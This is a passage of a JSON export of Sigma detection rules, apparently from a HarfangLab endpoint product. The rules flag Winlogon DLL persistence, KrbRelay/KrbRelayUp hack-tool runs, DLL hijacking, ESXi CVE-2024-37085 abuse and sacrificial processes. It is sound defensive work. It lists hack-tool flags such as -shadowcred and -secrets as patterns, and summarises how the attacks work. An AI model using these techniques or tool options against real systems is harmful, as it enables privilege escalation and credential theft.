NT\\CurrentVersion\\Winlogon\\Notify\\WPKGLogon\\DLLName'\n Details: '?:\\Program Files\\wpkg\\wpkglogon.dll'\n\n exclusion_resavista:\n ProcessImage|endswith: '\\RESAVistaIDSClient.exe'\n TargetObject:\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details|endswith: '\\RESAVistaIDSClient.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "20feacae-9a99-4ce6-8f8c-c02176cb730a", "rule_name": "Winlogon Helper DLL Installed", "rule_description": "Detects a change of the Winlogon configuration via registry modification.\nAttackers may abuse features of Winlogon to execute DLLs and/or executables at user logon.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n", "rule_creation_date": "2020-09-24", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1112", "attack.t1547.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21030089-c22d-4b59-9389-818ed924fae4", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.095808Z", "creation_date": "2026-03-23T11:45:34.095810Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.095815Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/cube0x0/KrbRelay/", "https://www.microsoft.com/en-us/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/", "https://attack.mitre.org/techniques/T1558/003/", "https://attack.mitre.org/techniques/T1550/003/" ], "name": "t1558_003_krbrelay_hacktool_usage.yml", "content": "title: KrbRelay HackTool Executed\nid: 21030089-c22d-4b59-9389-818ed924fae4\ndescription: |\n Detects the usage of the KrbRelay HackTool, which is a no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced.\n KrbRelay has already been used by attackers to perform various Active Directory attacks.\n It is recommended to check the behavioral context around the execution of this tool to determine whether it is legitimate.\nreferences:\n - https://github.com/cube0x0/KrbRelay/\n - https://www.microsoft.com/en-us/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/\n - https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/techniques/T1550/003/\ndate: 2023/07/06\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - attack.lateral_movement\n - attack.t1550.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.KrbRelay\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_krb_name:\n - Image|endswith: '\\KrbRelay.exe'\n - OriginalFileName: 'KrbRelay.exe'\n\n selection_cmd_default:\n CommandLine|contains|all:\n - ' -spn '\n - ' -clsid '\n\n selection_cmd_option:\n CommandLine|contains:\n - ' -rbcd '\n - ' -shadowcred'\n - ' -add-groupmember '\n - ' -laps'\n - ' -ssl'\n - ' -console'\n - ' -add-privileges '\n - ' -secrets'\n - ' -service-add '\n - ' -session '\n\n selection_cmd_llmnr:\n CommandLine|contains|all:\n - ' -llmnr'\n - ' -spn '\n - ' -secrets'\n\n selection_cmd_ntlm:\n CommandLine|contains|all:\n - ' -session '\n - ' -clsid '\n - ' -ntlm'\n\n condition: selection_krb_name or (selection_cmd_default and selection_cmd_option) or selection_cmd_llmnr or selection_cmd_ntlm\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21030089-c22d-4b59-9389-818ed924fae4", "rule_name": "KrbRelay HackTool Executed", "rule_description": "Detects the usage of the KrbRelay HackTool, which is a no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced.\nKrbRelay has already been used by attackers to perform various Active Directory attacks.\nIt is recommended to check the behavioral context around the execution of this tool to determine whether it is legitimate.\n", "rule_creation_date": "2023-07-06", "rule_modified_date": "2025-01-09", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1550.003", "attack.t1558.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21167834-ee25-40c7-a927-f927643c10a8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.599004Z", "creation_date": "2026-03-23T11:45:34.599007Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.599015Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_iisexpresstray.yml", "content": "title: DLL Hijacking via iisexpresstray.exe\nid: 21167834-ee25-40c7-a927-f927643c10a8\ndescription: |\n Detects potential Windows DLL Hijacking via iisexpresstray.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iisexpresstray.exe'\n ImageLoaded|endswith: '\\mscoree.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21167834-ee25-40c7-a927-f927643c10a8", "rule_name": "DLL Hijacking via iisexpresstray.exe", "rule_description": "Detects potential Windows DLL Hijacking via iisexpresstray.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2023-09-05", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21216328-38a3-45d2-b301-ea234729a5e0", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.610112Z", "creation_date": "2026-03-23T11:45:34.610116Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.610123Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/", "https://attack.mitre.org/techniques/T1078/002" ], "name": "t1078_002_possible_cve_2024_37085_exp_group.yml", "content": "title: Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass\nid: 21216328-38a3-45d2-b301-ea234729a5e0\ndescription: |\n Detects either a group creation or a member addition possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\n VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\n This group is not a built-in group in Active Directory and does not exist by default.\n It is recommended to investigate and determine if this is a legitimate administrative action.\nreferences:\n - https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/\n - https://attack.mitre.org/techniques/T1078/002\ndate: 2024/07/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078.002\n - cve.2024-37005\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.CVE-2024-37005\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID:\n - 4727 # Security-enabled Global Group was Created\n - 4728 # Member was Added to Security-enabled Global Group\n - 4755 # Security-enabled Universal Group was Created\n - 4756 # Member was Added to Security-enabled Universal Group\n GroupName: 'ESX Admins'\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21216328-38a3-45d2-b301-ea234729a5e0", "rule_name": "Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass", "rule_description": "Detects either a group creation or a member addition possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\nVMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nThis group is not a built-in group in Active Directory and does not exist by default.\nIt is recommended to investigate and determine if this is a legitimate administrative action.\n", "rule_creation_date": "2024-07-30", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1078.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21364c07-fc54-4cf0-8a5e-4dd14ed9910d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.098621Z", "creation_date": "2026-03-23T11:45:34.098623Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.098627Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_multidigimon.yml", "content": "title: DLL Hijacking via multidigimon.exe\nid: 21364c07-fc54-4cf0-8a5e-4dd14ed9910d\ndescription: |\n Detects potential Windows DLL Hijacking via multidigimon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'multidigimon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\NInput.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21364c07-fc54-4cf0-8a5e-4dd14ed9910d", "rule_name": "DLL Hijacking via multidigimon.exe", "rule_description": "Detects potential Windows DLL Hijacking via multidigimon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2140fee8-47d6-4020-b659-5713bfec9a3c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.075299Z", "creation_date": "2026-03-23T11:45:34.075301Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.075305Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/Dec0ne/KrbRelayUp", "https://twitter.com/malmoeb/status/1552403545793581056?t=1MuOT3JoyUWqfpp3CBbPLg&s=19", "https://attack.mitre.org/techniques/T1558/003/", "https://attack.mitre.org/techniques/T1550/003/" ], "name": "t1558_003_krbrelayup_tool_usage.yml", "content": "title: KrbRelayUp HackTool Executed\nid: 2140fee8-47d6-4020-b659-5713bfec9a3c\ndescription: |\n Detects the usage of the KrbRelayUp HackTool, which is a no-fix local privilege escalation in Windows domain environments using Kerberos.\n This tool provides a streamlined wrapper around several well-known tools such as \"Rubeus\", \"KrbRelay\", \"ADCSPwn\", \"Whisker\" and \"SCMUACBypass\".\n It automates local privilege escalation by coercing machine account authentication, relaying Kerberos to LDAP or ADCS, and abusing S4U2Self or RBCD to gain NT AUTHORITY/SYSTEM access.\n The tool also includes support for shadow credentials, eliminating the need for additional machine accounts. Furthermore, it bypasses mitigations like Protected Users by leveraging PKInit-based authentication.\n It is recommended to check the context of use of this tool and to look for other malicious actions on the host.\n If no legitimate use of this tool is identified, the machine should be isolated and investigated immediately.\nreferences:\n - https://github.com/Dec0ne/KrbRelayUp\n - https://twitter.com/malmoeb/status/1552403545793581056?t=1MuOT3JoyUWqfpp3CBbPLg&s=19\n - https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/techniques/T1550/003/\ndate: 2022/08/03\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - attack.lateral_movement\n - attack.t1550.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.KrbRelayUp\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_krb_name:\n - Image|endswith: '\\KrbRelayUp.exe'\n - OriginalFileName: 'KrbRelayUp.exe'\n\n selection_cmd_relay:\n CommandLine|contains: ' relay '\n\n selection_cmd_spawn:\n CommandLine|contains: ' spawn '\n\n selection_cmd_krbscm:\n CommandLine|contains: ' krbscm '\n\n selection_cmd_domain:\n CommandLine|contains:\n - ' -d '\n - ' --Domain '\n - ' -Domain '\n\n selection_cmd_cn:\n CommandLine|contains:\n - ' -cn '\n - ' --ComputerName '\n - ' -ComputerName '\n\n selection_cmd_service_command:\n CommandLine|contains:\n - ' -s '\n - ' -sc '\n - ' --ServiceName '\n - ' --ServiceCommand'\n - ' -ServiceName '\n - ' -ServiceCommand'\n\n condition: selection_krb_name or\n ((selection_cmd_relay or selection_cmd_spawn) and selection_cmd_domain and selection_cmd_cn) or\n (selection_cmd_krbscm and selection_cmd_service_command)\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2140fee8-47d6-4020-b659-5713bfec9a3c", "rule_name": "KrbRelayUp HackTool Executed", "rule_description": "Detects the usage of the KrbRelayUp HackTool, which is a no-fix local privilege escalation in Windows domain environments using Kerberos.\nThis tool provides a streamlined wrapper around several well-known tools such as \"Rubeus\", \"KrbRelay\", \"ADCSPwn\", \"Whisker\" and \"SCMUACBypass\".\nIt automates local privilege escalation by coercing machine account authentication, relaying Kerberos to LDAP or ADCS, and abusing S4U2Self or RBCD to gain NT AUTHORITY/SYSTEM access.\nThe tool also includes support for shadow credentials, eliminating the need for additional machine accounts. Furthermore, it bypasses mitigations like Protected Users by leveraging PKInit-based authentication.\nIt is recommended to check the context of use of this tool and to look for other malicious actions on the host.\nIf no legitimate use of this tool is identified, the machine should be isolated and investigated immediately.\n", "rule_creation_date": "2022-08-03", "rule_modified_date": "2025-02-13", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1550.003", "attack.t1558.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "21699dd6-a401-4ab8-bbda-d513d587c561", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.593663Z", "creation_date": "2026-03-23T11:45:34.593667Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.593675Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://twitter.com/0gtweet/status/1564131230941122561", "https://dennisbabkin.com/blog/?t=pwning-windows-updates-dll-hijacking-through-orphaned-dll", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_phantom_dll_hijacking_deviceenroller.yml", "content": "title: Phantom DLL Hijacking via DeviceEnroller.exe\nid: 21699dd6-a401-4ab8-bbda-d513d587c561\ndescription: |\n Detects potential Phantom DLL Hijacking via DeviceEnroller.exe.\n Phantom DLL Hijacking takes advantage of non-existing DLL that a legitimate application tries to load.\n Attackers used this technique by copying a malicious DLL to System32 under ShellChromeAPI.dll, which is loaded by DeviceEnroller.exe if the parameter /PhoneDeepLink is present.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1564131230941122561\n - https://dennisbabkin.com/blog/?t=pwning-windows-updates-dll-hijacking-through-orphaned-dll\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/30\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'deviceenroller.exe'\n ProcessCommandLine|contains: 'PhoneDeepLink'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\ShellChromeAPI.dll'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "21699dd6-a401-4ab8-bbda-d513d587c561", "rule_name": "Phantom DLL Hijacking via DeviceEnroller.exe", "rule_description": "Detects potential Phantom DLL Hijacking via DeviceEnroller.exe.\nPhantom DLL Hijacking takes advantage of non-existing DLL that a legitimate application tries to load.\nAttackers used this technique by copying a malicious DLL to System32 under ShellChromeAPI.dll, which is loaded by DeviceEnroller.exe if the parameter /PhoneDeepLink is present.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-08-30", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2169b294-00f6-4185-922a-6e8744093010", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.627015Z", "creation_date": "2026-03-23T11:45:34.627017Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.627021Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_002_dll_hijacking_obs_ffmpeg_mux.yml", "content": "title: DLL Hijacking via obs-ffmpeg-mux.exe\nid: 2169b294-00f6-4185-922a-6e8744093010\ndescription: |\n Detects potential Windows DLL Hijacking via obs-ffmpeg-mux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2025/01/08\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessName: 'obs-ffmpeg-mux.exe'\n ProcessSignature: 'Hugh Bailey'\n ImageLoaded|endswith: '\\obs.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\obs-studio\\bin\\64bit\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Hugh Bailey'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2169b294-00f6-4185-922a-6e8744093010", "rule_name": "DLL Hijacking via obs-ffmpeg-mux.exe", "rule_description": "Detects potential Windows DLL Hijacking via obs-ffmpeg-mux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2025-01-08", "rule_modified_date": "2026-02-10", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "218a81a4-f938-453b-aa3e-57226b82c69c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.074289Z", "creation_date": "2026-03-23T11:45:34.074291Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.074295Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.todyl.com/blog/investigating-malicious-use-onenote-deploy-qbot", "https://attack.mitre.org/techniques/T1055/" ], "name": "t1055_sacrificial_process_atbroker.yml", "content": "title: ATBroker.exe Sacrificial Process Spawned\nid: 218a81a4-f938-453b-aa3e-57226b82c69c\ndescription: |\n Detects the suspicious execution of the legitimate ATBroker.exe Windows binary, spawned without arguments and in an abnormal execution context.\n This can be indicative that the binary is being used as a sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected 